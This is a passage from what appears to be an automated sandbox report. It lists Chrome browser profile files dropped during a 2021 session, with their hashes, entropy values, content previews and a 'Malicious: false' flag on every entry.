SHA-512:	F02A64D8B286B7F506160668DCA93699D58AEB916193C721D22D6929BA92FB7D39D46298294BC5660201488256E1572A38E26C28A774D395F11B95E7A2108AD6
Malicious:	false
Preview:	..&f..................;e................next-map-id.1.Fnamespace-42cebae4_3b6a_4fc5_8aa0_8493010d4a46-https://www.google.com/.0V.e................V.e................V.e.................I.\................map-0-rc::b..0.5.A.N.b.l.m.n.j.W.m.f.k.x.L.T.T.L.W.7.X.6.o.n.0.j.d.N.n.8.S.N.X.K.y.i.I.J.2.4.T.l.C.F.H.l.h.K.d.2.f.B._.z.q.U.K.N.B.0.M.K.G.O.r.z.L.m.b.6.j.b.W.8.X.e.K.g.n.t.3.W.E.N.I.I.j.p.b.5.D.8.E.Z.e.l.p.D.P.-.W.Y.4.o.j.i.a.D.v.R.2.H.v.D.P.P.n.7.P.v.M.O.v.u.A.H.m.s.d.h.J.8.o.X._.-.0.x.l.m.U.h.z.u.F.P.j.A.G.1.e.F.z.z.U.R.z.C.W.7.y.7.Y.V.v.P.g.j.5.m.p.3.4.g.z.T.B.T.O.J.9.z.S.A.f.U.m.7.S.1.r.l.X.l.C.T.J._.X.h.u.z.e.4.c.K.Q.r.a.0.t.b.e.z.k.V.C.P.S.0.2.v.t.K.g.0.q.o.V.K.b.d.v.4.D.c.h.k.Q.D.G.R.N.a._.9.5.-.0.W.A.6.V.2.B.r.n.4._.g.G.p.m.a.8.V.T.G.3.M.o.L.d.1.m.V.P.h.g.l.A.G._.k.L.s.p.2.7.5.k.9.u.d.x.D._.1.y.Q.F.q.k.U.u.3.G.a.O.C.d.j.F.a.l.c.M...map-0-rc::c..B.E.Q.d.T.G.X.Q.f.Q.D.W.J.i.u._.I.Y.b.q.4.a.m.B.d.N.m.u.4.R.t.q.O.1.k.8.1.r.Q.4.-.Z.h.V.n.J.E.N.n.k.b.L.s.-.U.2.-.l.W.l.R.S.h.R.1.i.j

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\LOG Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	320
Entropy (8bit):	5.1434119686776
Encrypted:	false
SSDEEP:	6:mX/MqM+q2PWXp+N23iKKdKrQMxIFUtp8/c8ZZmwP8/pMVkwOWXp+N23iKKdKrQMT:s/o+va5KkCFUtp8/cQ/P8/iV5f5KktJ
MD5:	69E6FECE143F1FCB12889B9B3870F508
SHA1:	308E4502AFB60277D8F232D22EDE24A27F2CC0EB
SHA-256:	F996AD74DB5B81908F350362BDE62B8EAF21B914F6D4C7F570DA28FB2BE904BD
SHA-512:	9449E0C27D93D178BFE98624C2C8CAED08ACD4680F1346F29AE0F60030965F90CACCB81632F2BD7ADF7C150BF9C8334159F2DC124218A9D40F2DFDF2D5D41789
Malicious:	false
Preview:	2021/05/12-21:52:02.470 18ac Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage/MANIFEST-000001.2021/05/12-21:52:02.471 18ac Recovering log #3.2021/05/12-21:52:02.472 18ac Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage/000003.log .

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\000003.log Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.330506048642
Encrypted:	false
SSDEEP:	3:uwknmUB4Vycbhjn:uRnmUBcbhjn
MD5:	A1D710BD413914AAAE5735C5BAA9422B
SHA1:	A3E92CA78C4FFD88D849AB04CD8A490FF8E022CD
SHA-256:	692891ADFCFD32BB2F176F386B3BC29D2811218093E40C489A30DB6ECECEECF3
SHA-512:	A2DD94EB8B39F698387EE3B1F257F740FCD607806867B9A7F3507BDBEDF15FB934010A5F5423E378C15C04D356DEBC5CCD8B41A2CD1637BCB96B2E253668B441
Malicious:	false
Preview:	..(X5............... 98e2bea070252df09ec5095d018a40e8......

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\LOG Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	348
Entropy (8bit):	5.125109893329465
Encrypted:	false
SSDEEP:	6:mXDMSVq2PWXp+N23iKKdK7Uh2ghZIFUtp8fNxgZmwP8f/+IkwOWXp+N23iKKdK7w:sDMOva5KkIhHh2FUtp8M/P855f5KkIh9
MD5:	F50E66E931DBC9091B70EA9D5258F2D7
SHA1:	D8D172A530C60128A1355D8A2814AA35298171E1
SHA-256:	79308D0FF4E02E340922F30542A4AC29D2DFECD908B72A42AA2FBDE266B2A3B1
SHA-512:	24BF91C627F740A9844023FFF47164C494130B17DA24588348D43FAB4E3F01EDFD5AF6A6F7927A8B3DA1D93764DBEC8D4F967DBBC096F8A5D515E5BBF88BE688
Malicious:	false
Preview:	2021/05/12-21:52:02.296 1860 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database/MANIFEST-000001.2021/05/12-21:52:02.300 1860 Recovering log #3.2021/05/12-21:52:02.301 1860 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database/000003.log .

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\GPUCache\data_1 Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	296
Entropy (8bit):	0.19535324365485862
Encrypted:	false
SSDEEP:	3:8E:8
MD5:	C4DF0FB10C4332150B2C336396CE1B66
SHA1:	780A76E101DE3DE2E68D23E64AB1A44D47A73207
SHA-256:	18FAB4D13CDA7E1DEE12DC091019A110A7304B6A65FC9A1F3E6173046BA38EF6
SHA-512:	51F0B463E97063A2357285D684FF159FDF6099E57C46F13C83E9D3F09D7A7CF03C1BA684BCCF36232FC50834F95953C3C68675C7B05AB4F84DEF1C566A5F3F5E
Malicious:	false
Preview:	.'..(...................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Local Storage\leveldb\LOG Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	430
Entropy (8bit):	5.2407115910810385
Encrypted:	false
SSDEEP:	6:mX5GSMM+q2PWXp+N23iKKdKusNpV/2jMGIFUtp8rtmZmwP8rtpMVkwOWXp+N23i3:s5GSN+va5KkFFUtp8Jm/P8JiV5f5KkOJ
MD5:	5E6560136404FF02C35CADE2DC01DAB2
SHA1:	522667DC4A544F578009ACAB3817FB9FFEC302AB
SHA-256:	35D6B7300511F077481463CE37B18AD3015150B635BE20403685F0757117A953
SHA-512:	E2CE2F317606C486B2928BAEB10D741D36580BECEFB7FADC55CA8071CE9AF269B79C474FAD6B961505B9E61B139B0464C8F5276B23CE443CFE8FED23D8A35D0D
Malicious:	false
Preview:	2021/05/12-21:52:02.488 18ac Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Local Storage\leveldb/MANIFEST-000001.2021/05/12-21:52:02.489 18ac Recovering log #3.2021/05/12-21:52:02.489 18ac Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Platform Notifications\LOG Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	432
Entropy (8bit):	5.254470223923754
Encrypted:	false
SSDEEP:	6:mXZj+q2PWXp+N23iKKdKusNpqz4rRIFUtp8ZjZmwP8ZTVkwOWXp+N23iKKdKusN9:sZ6va5KkmiuFUtp8Zj/P8Z55f5Kkm2J
MD5:	4DC95B8C99339E48E235972FFAB56321
SHA1:	125B35C709D206D73AC183F78D9BF0A62C79E3CF
SHA-256:	FCAA872937EEB4EE3B4A3114A7279D462A746B0437664587E9C7709CA4FBAE42
SHA-512:	960AB481DE32B6E442DFAD0E046CD7904AB28D848F006C5D5F9EBCE42776FA03F83AEF97941607B17D42BE6727015FF3F9754BB59722C0B772B30114CD1720B3
Malicious:	false
Preview:	2021/05/12-21:52:02.559 18a8 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Platform Notifications/MANIFEST-000001.2021/05/12-21:52:02.560 18a8 Recovering log #3.2021/05/12-21:52:02.560 18a8 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Platform Notifications/000003.log .

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Session Storage\000003.log Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	19
Entropy (8bit):	1.9837406708828553
Encrypted:	false
SSDEEP:	3:5l:5l
MD5:	E556F26DF3E95C19DBAECA8F5DF0C341
SHA1:	247A89F0557FC3666B5173833DB198B188F3AA2E
SHA-256:	B0A7B19404285905663876774A2176939A6ED75EF3904E44283A125824BD0BF3
SHA-512:	055BC4AB12FEEDF3245EAAF0A0109036909C44E3B69916F8A01E6C8459785317FE75CA6B28F8B339316FC2310D3E5392CD15DBDB0F84016667F304D377444E2E
Malicious:	false
Preview:	..&f...............

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Session Storage\LOG Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	418
Entropy (8bit):	5.249244123538631
Encrypted:	false
SSDEEP:	6:mXsJE0yq2PWXp+N23iKKdKusNpZQMxIFUtp8stG/1ZmwP8eRkwOWXp+N23iKKdKl:ssJfyva5KkMFUtp8stG9/P8eR5f5KkTJ
MD5:	FD570882BAD3538561FC3DD702741973
SHA1:	246CE4BFA43A03FDB21EEFF701ABDEB9203427EF
SHA-256:	8690AE07785C90DAFA078914FE6A4E0EF9B2B0B9F67C76D179473ACDF0B6642C
SHA-512:	7407C4EDF960757D924A714B7468E2A8F12521866804D6B55E47E636D142D9F9B5D87369AB2A5A4D3C9B8A715660D9E5B37C24C8D1522BA6B83F71E184CD68F7
Malicious:	false
Preview:	2021/05/12-21:52:19.006 18a4 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Session Storage/MANIFEST-000001.2021/05/12-21:52:19.009 18a4 Recovering log #3.2021/05/12-21:52:19.011 18a4 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Session Storage/000003.log .

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\a272768a-2d2b-447d-9f4d-ad5da35b066d.tmp Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	420
Entropy (8bit):	4.985305467053914
Encrypted:	false
SSDEEP:	6:YHpoNXR8+eq7JdV5qQlsDHF4xj70PpqQEsDHF4R8HLJ2AVQBR70S7PMVKJw1K3Ky:YHO8sdBsB6MAsBdLJlyH7E4f3K33y
MD5:	C401B619D9D8E0ADABC25A47EE49CFBA
SHA1:	C9D3B816DD3FBCD98E9C0A32CEC7B501EFC0BBDA
SHA-256:	8F5D75F5EF9876E8D30CE477509F735B50C4D87DBEDB433BE8EDBE6D4B3CB82F
SHA-512:	BC12F16CB95CB0AD708C6BBD005EF863A8552613E612F1084086E0F8262752E1B5144D044F0D141CE8462CC33343C36B517A5CC778751680485D8F88FB51B862
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_versions":[50],"expiration":"13248543490879170","port":443,"protocol_str":"quic"},{"advertised_versions":[73],"expiration":"13248543490879171","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://dns.google","supports_spdy":true}],"version":5},"network_qualities":{"CAASABiAgICA+P////8B":"4G","CAESABiAgICA+P////8B":"4G"}}}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\08d7be13-d743-4068-aaec-c768e3510e7b.tmp Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	420
Entropy (8bit):	4.954960881489904
Encrypted:	false
SSDEEP:	12:YHO8sdvBVSsB6M/BVSsBdLJlyH7E4f3K33y:YXsdvjX6gjXdL3yH7n/iy
MD5:	F4FEFEEEC722772F9DC0FCE1B52D79B5
SHA1:	00EECFA3B37113D30E7D43BE4383C540F3D93D4D
SHA-256:	D33E13C12004A700F246D8C73709114A881609D658E045D54DE36874728D07F0
SHA-512:	41E61EC89366800FD5F4DD704E53B47DE29411B9088B46349A0A350758D08569C14DCC70CF8D6A6FE6D049CB6D32F2B091153E8148A1B5857BD7AF13492071BE
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_versions":[50],"expiration":"13248543498399332","port":443,"protocol_str":"quic"},{"advertised_versions":[73],"expiration":"13248543498399332","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://dns.google","supports_spdy":true}],"version":5},"network_qualities":{"CAASABiAgICA+P////8B":"4G","CAESABiAgICA+P////8B":"4G"}}}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache\data_1 Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	592
Entropy (8bit):	0.19535324365485862
Encrypted:	false
SSDEEP:	3:8E8E:8N
MD5:	B505641E5E90B7CF4BC869DD1B4BE451
SHA1:	0EC7B13DC043E054AB48B8F45FE49EF1209C01AA
SHA-256:	2755F85F14CF33404CEEBF053D0CB79DC3B98D643A51075737E6A5BE154FE1D9
SHA-512:	610AF095630C93B0586F4D9CA84FA75454C472C557D4FDBC0D5C1851F9AABF8653079A7ADE4659ABADDEDC2E02E58AD13C7244CD004B0AA5A462307F293F83A3
Malicious:	false
Preview:	.'..(....................................................................................................................................................................................................................................................................................................'..(...................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\LOG Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	430
Entropy (8bit):	5.1540382609755
Encrypted:	false
SSDEEP:	12:s5N+va5KkkGHArBFUtp8s/P8OVUBV5f5KkkGHAryJ:q6a5KkkGgPgvVCf5KkkGga
MD5:	0D61D4883EEA2105B839B0C7434B171A
SHA1:	8A4726A407FE5DFAEC293879D8CB4A9A3E5BE97C
SHA-256:	DF0A87A2CF05B387F81E7DCAFC31D539BB873A9B9FAA60F3645665C1AEB9A804
SHA-512:	D6EE9095375B8B9FECCF65B855D973DAB47E15BAD12117578586FDA8A7C4FC1C51397157CA3FF9BE113C421F65B99F5426AE60B4FCC812F735D0A05F79F2CEA3
Malicious:	false
Preview:	2021/05/12-21:52:10.298 18ac Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb/MANIFEST-000001.2021/05/12-21:52:10.299 18ac Recovering log #3.2021/05/12-21:52:10.302 18ac Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Platform Notifications\LOG Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	432
Entropy (8bit):	5.184866274391963
Encrypted:	false
SSDEEP:	12:sMyva5KkkGHArqiuFUtp8//P8oR5f5KkkGHArq2J:lYa5KkkGgCgkDf5KkkGg7
MD5:	A384513D45BA2BD7E7B29DDCDF73D5FB
SHA1:	AFF1653F69C8F2D6660398D42D8FCBFF2F2F5458
SHA-256:	90000C6BCCBE6B6A39F04A65E9CF6098D8A5A5BA0CC52CEFDA3E6D7D2E17538C
SHA-512:	324BE78C5444D96E5B0876A351F1692CB5FCC6EA911587F195653146AF10ED34AD0FF5EF5A5F7E57FDF3BFAA2E0A6924A93B8D91EB3669DB60B0A5F871CF8A28
Malicious:	false
Preview:	2021/05/12-21:52:10.311 18a4 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Platform Notifications/MANIFEST-000001.2021/05/12-21:52:10.314 18a4 Recovering log #3.2021/05/12-21:52:10.315 18a4 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Platform Notifications/000003.log .

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage\000003.log Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	38
Entropy (8bit):	1.9837406708828553
Encrypted:	false
SSDEEP:	3:5ljl:5ljl
MD5:	E9C694B34731BF91073CF432768A9C44
SHA1:	861F5A99AD9EF017106CA6826EFE42413CDA1A0E
SHA-256:	01C766E2C0228436212045FA98D970A0AD1F1F73ABAA6A26E97C6639A4950D85
SHA-512:	2A359571C4326559459C881CBA4FF4FA9F312F6A7C2955B120B907430B700EA6FD42A48FBB3CC9F0CA2950D114DF036D1BB3B0618D137A36EBAAA17092FE5F01
Malicious:	false
Preview:	..&f.................&f...............

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage\LOG Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	418
Entropy (8bit):	5.20339470993773
Encrypted:	false
SSDEEP:	12:s00p+va5KkkGHArAFUtp80ef/P80efV5f5KkkGHArfJ:f7a5KkkGgkg90if5KkkGgV
MD5:	B6FF21FD580A5DB9045E59FF95E1F8EC
SHA1:	FD6FCFED47A48E2B4F654951BA34273C96E67CAC
SHA-256:	66B2A5517CD0C2ABC7DC6933BB05F84E38BD1A07548D53E1E1FAA5A1E72C04CD
SHA-512:	DCF4362E8A286D1A1B8FC0C68B3D2D1635945CE1EFC0239F9A70133F3643334CE4D2FE9CC1B647E82CA407802F87B83A7177D6A2F6E4A2249AD48EB9DB3D86A4
Malicious:	false
Preview:	2021/05/12-21:52:25.565 18bc Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage/MANIFEST-000001.2021/05/12-21:52:25.567 18bc Recovering log #3.2021/05/12-21:52:25.567 18bc Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage/000003.log .

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000003.log Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	38
Entropy (8bit):	1.9837406708828553
Encrypted:	false
SSDEEP:	3:sgGg:st
MD5:	45A8ECA4E5C4A6B1395080C1B728B6C9
SHA1:	8A97BB0E599775D9A10C0FC53C4EDB29AA4CEB4E
SHA-256:	DB320AB28DFF27CDA0A7F87B82F2F8E61B3178A6DE8503753D76F1172D32E08E
SHA-512:	8EE91A3A1E77459273553F6A776C423A8EE95DB9DCFA897771814B7AD13FD84F06BB2B859F22B6DDA384B39EAA91F1819F170BABED6DA16BDBCF5BCB06CF2124
Malicious:	false
Preview:	..F..................F................

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.179586466657797
Encrypted:	false
SSDEEP:	6:mXf/Si+q2PWXp+N23iKKdKpIFUtp8fBJWZmwP8f5JNVkwOWXp+N23iKKdKa/WLJ:sl+va5KkmFUtp8HW/P8xV5f5KkaUJ
MD5:	52B95996CD96A27EAA25719264F3A078
SHA1:	BA09AAD49354E0B1ECE644EDB24756232402BDA5
SHA-256:	0CDBDA09247368AC2CE8629C3E45056A28C21DC91B90262504EAF6492E3D5998
SHA-512:	2F877660B1F2873E89AC010053E1764AE506B450A81D13C5571174B0CDA9FF438E612622ACC35046FEF10B3BA2869DB4BC6F22D34C9378381F11C0E0F038D04D
Malicious:	false
Preview:	2021/05/12-21:52:02.301 185c Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2021/05/12-21:52:02.304 185c Recovering log #3.2021/05/12-21:52:02.305 185c Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB/000003.log .

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm\LOG Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	402
Entropy (8bit):	5.2984747020222205
Encrypted:	false
SSDEEP:	12:sxyva5KkkOrsFUtp8P/P8rR5f5KkkOrzJ:IYa5Kk+grDf5Kkn
MD5:	54731D616C9F952B98E3A2A287477D0D
SHA1:	09699090CC34E38A12D09865301CA0CE8CC604C2
SHA-256:	2052B8F4F2DB00EEDAF6D031ED5436017AB9C155D5F64E7AED64B8CB05ADC3F2
SHA-512:	36F9FC165FCE919EBAAAC9ACC5F0A9877DCC3298438065751C527D4F5C3E3B0659974E24CB9949D2761B5DE59181B656338849E0B36D3118FAC66D9F55033641
Malicious:	false
Preview:	2021/05/12-21:52:11.542 18a4 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm/MANIFEST-000001.2021/05/12-21:52:11.544 18a4 Recovering log #3.2021/05/12-21:52:11.544 18a4 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm/000003.log .

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Visited Links Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	120
Entropy (8bit):	5.431141757055857
Encrypted:	false
SSDEEP:	3:+poHl++tXl4urod6SQyg/mn9D8l/vVcoleY1WT93HDlR:WbVuXJO9g3cnYWJ
MD5:	D71207629DE5F981D900A17B9281CB09
SHA1:	928C06BEF1C6F6FFE56895A6DBEF5EF40AF4773A
SHA-256:	B1A6610303A21C8A48F255EE7A0E701193354430678C95C9BB8C20DE601A78F5
SHA-512:	FD79936B6BAE5C992640CC852121553AEA71DB75EE7CA1CB0AF99FD6832F5381A88826100E691BC9BF82B61F3D757742A745726395FA2C1D88D5B33DA677D6FA
Malicious:	false
Preview:	....../..L.......i._..e.......i3d.........w5W.....4..]K......2..Sf.........f.b........`>.=.......i.X.......B{....0

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_nmmhkkegccagdldgiimedpiccmgmieda\03ac99f3-643f-481c-85f6-48d54b737f8e.tmp Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 13 icons, 8x8, 32 bits/pixel, 10x10, 32 bits/pixel
Category:	dropped
Size (bytes):	175509
Entropy (8bit):	5.489440694064333
Encrypted:	false
SSDEEP:	1536:rKbsLAR2A4VBQV1111111111111Nr366R6faFR+up0y0y2im1OsFcgYzQNL9X:rKbsLAR2fe/FZntrslfX
MD5:	33EABC19FDF40F3D36B6870EF5861957
SHA1:	CF3EF59C3940B58C314E9F6A1616751553F2D9A2
SHA-256:	647D07F37554672865902B2CEE80864B5A5283C372C7263BB1497D5582054E57
SHA-512:	47CFEDB1FDBC9BC09905C70F69A5114C64A8FC791BCA480D24972275276F00CEB230C579B4217337F9C69ECB2AB3221A3B549F06E8074D76BCE2F31773FB69F5
Malicious:	false
Preview:	............ .H............. ............... .p............. .h...n......... ............... ......... .... .....n...((.... .h.......00.... ..%..~H..@@.... .(B..&n..``.... .....N......... .(....D........ .w`...M..(............. ..............................+.O-8&]P>/^Q?-^&:?I.1;<....qye.f.%.......X...E.....I...k}....{.m.t.CP..........E...\...............=H..,A..,J..;P......................................................................................nnp}nnp}........~~~........!...!---2---2... ........................................(............. ................................!...7.#.:3,";3,!<.&'/............NPLYt.F.K.%.....L..C.....1...`...KOPVutz}..A.BxX.......P...Q.....1...x...tqpyxuux...0D..DP..........G...........uojuppnw....t\|..9F..-=..+:..5:..rr......llkrkkmw................................ggitllkv................................hhgssss~............YY\eYY[e............nnnzXXXa.............................RRR\..........................................................

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_nmmhkkegccagdldgiimedpiccmgmieda\Chrome Web Store Payments.ico.md5 Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	16
Entropy (8bit):	4.0
Encrypted:	false
SSDEEP:	3:SeFcn:Sec
MD5:	61B979ECA159ECAC9C7F8F1D6FD43E9D
SHA1:	0373696351FC2172E811DA8393DEC84036FA34A0
SHA-256:	AB05E0A6FF7E8FFF89F924B279D93AFC72ACCE817C4D250C60BB8059CC534303
SHA-512:	C95825DA33CBDDFA627D9FF9A5B8371BC5F4E643A09573B6E1E839A83B619F53D878C344030B9701DCBC24D4CECCC016CF4D298D10EE8C37D1B5FEC1A51682B6
Malicious:	false
Preview:	F......r...(R..

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\aa532e48-b5df-461e-98b8-45ec6438bf4b.tmp Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\af881b9e-397e-4fad-af41-04b8107a331a.tmp Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	22596
Entropy (8bit):	5.535368726956034
Encrypted:	false
SSDEEP:	384:smSt5LlUrX51kXqKf/pUZNCgVLH2HfD7rUYXHGTknTlEo48K4LH:gLl251kXqKf/pUZNCgVLH2HfnrUY3GTo
MD5:	2A0896A94CABCBB48CFA50D5DA30A7D4
SHA1:	C504C619146EC064B30E9619ABF90D1FAB3010C8
SHA-256:	2CB846F99EF1B585275A8560A1782343E1A76A9281BE201AA897B615ECD8DE7B
SHA-512:	17DFB5F2E897F23A50EB50A3579FDB2DA93246716B1B81FD6EE9C5FBF3AB0BE839B83FCA86695F9DD3A4994AC443A2636C04703FB824579D5C01009F1A0EFEB3
Malicious:	false
Preview:	{"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"manifest_permissions":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_bookmark":false,"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13265355122297996","location":5,"manifest":{"app":{"launch":{"web_url":"https://chrome.google.com/webstore"},"urls":["https://chrome.google.com/webstore"]},"description":"Discover great apps, games, extensions and themes for Google Chrome.","icons":{"128":"webstore_icon_128.png","16":"webstore_icon_16.png"},"key":"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCtl3tO0osjuzRsf6xtD2SKxPlTfuoy7AWoObysitBPvH5fE1NaAA1/2JkPWkVDhdLBWLaIBPYeXbzlHp3y4Vv/4XG+aN5qFE3z+1RU/NqkzVYHtIpVScf3DjTYtKVL66mzVGijSoAIwbFCC3LpGdaoe6Q1rSRDp76wR6jjFzsYwQIDAQAB","name":"Web Store","pe

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\000004.dbtmp Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
